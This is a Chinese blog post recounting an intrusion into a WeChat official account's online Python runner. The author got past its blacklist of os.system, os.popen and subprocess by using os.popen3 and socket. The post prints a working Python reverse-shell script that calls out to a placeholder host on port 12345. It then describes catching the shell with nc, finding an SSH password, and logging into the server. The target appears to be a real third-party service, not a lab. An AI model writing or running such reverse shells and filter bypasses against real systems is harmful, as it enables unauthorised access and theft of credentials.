Python在线编码导致命令执行

看到某公众号提供"Python在线编写"功能,测试了几个函数.
以下常规的都被过滤了

os.system
os.popen
subprocess
commands

然后试试os.popen2/3/4发现可以import,同时socket也可以使用

这样就写了个反弹shell的脚本:

import socket
from os import popen3

s = socket.socket()
s.connect(('xx.xx.xx.xx', 12345))

for i in range(10000):
    ans = popen3(s.recv(1024))
    s.send(ans[1].read() + ans[2].read())

敲进去

这里写图片描述

这边用nc监听,拿到shell

这里写图片描述

发现敏感文件,验证了一下是ssh的密码,登入之后就可以执行交互式的命令了

帐号权限比较低,不过还是有些信息泄漏
这里写图片描述

看到服务器的源码,针对用户输入采用黑名单过滤.这样的in判断直接编码一下就能绕过,而且黑名单基本不可能覆盖全面.

这里写图片描述

该测试未影响系统服务的正常运行,未修改及泄漏任何系统数据,仅供技术交流.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值